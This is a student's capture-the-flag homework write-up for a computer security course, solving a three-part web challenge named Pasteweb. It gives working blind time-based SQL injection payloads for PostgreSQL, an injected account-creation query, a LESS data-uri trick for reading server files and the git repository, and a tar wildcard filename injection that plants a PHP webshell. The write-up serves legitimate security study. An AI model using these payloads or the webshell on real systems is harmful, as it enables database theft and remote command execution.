# NTU Computer Security HW4 ###### tags: `NTU` ## Pasteweb ### p1 * **core: blind time based SQLI** * database type discovery: use ```pg_sleep``` * can execute stack query * schema dumping & leak character by character * table: ```SELECT case when substr(array_agg(concat(table_name))::text, {idx}, 1)='{c}' then pg_sleep(2) else pg_sleep(0) end FROM information_schema.tables``` * column: ```SELECT case when substr(array_agg(concat(column_name))::text, {idx}, 1)='{c}' then pg_sleep(2) else pg_sleep(0) end FROM information_schema.columns WHERE table_name='{table_name}'``` * data leaking: ```SELECT case when substr(array_agg(concat(fl4g))::text, {idx}, 1)='{c}' then pg_sleep(2) else pg_sleep(0) end FROM {table_name}``` ### p2 #### create user * from previously leaked data, we can obtain the user's account & password * from password size, we can know that it use md5 hash * create user statement: ```insert into pasteweb_accounts (user_account, user_password) VALUES('{username}','{md5(username.encode()).digest().hex()}')``` #### git discovery * from https://pasteweb.ctf.zoolab.org/.git/ we can know that there is a git repo which can obtain source code later * use ```data-uri``` in less to leak arbitrary file(except ```*.php``` and ```../``` path traversal) server ```less p { color: data-uri('{path}'); } ``` * create a proxy server and leak git with [scrabble](https://github.com/denny0223/scrabble) * done, flag is in ```index.php``` ### p3 * **core: tar wildcard exploit** * create a file with ```--checkpoint``` prefix, here we will create ```--checkpoint-action=exec=sh input.less .css``` where ```input.less``` will be the malicious shell script later on * to trigger checkpoint, we have to create a file huge enough. in linux, each checkpoint 10 records and each record require 20*512 bytes * hence, we can create our own webshell by ```echo '<?php system($_GET["cmd"]) ?>' > meow.php ``` with very long comment * access ```/sandbox/md5(username)/meow.php``` then we can execute arbitrary command with query string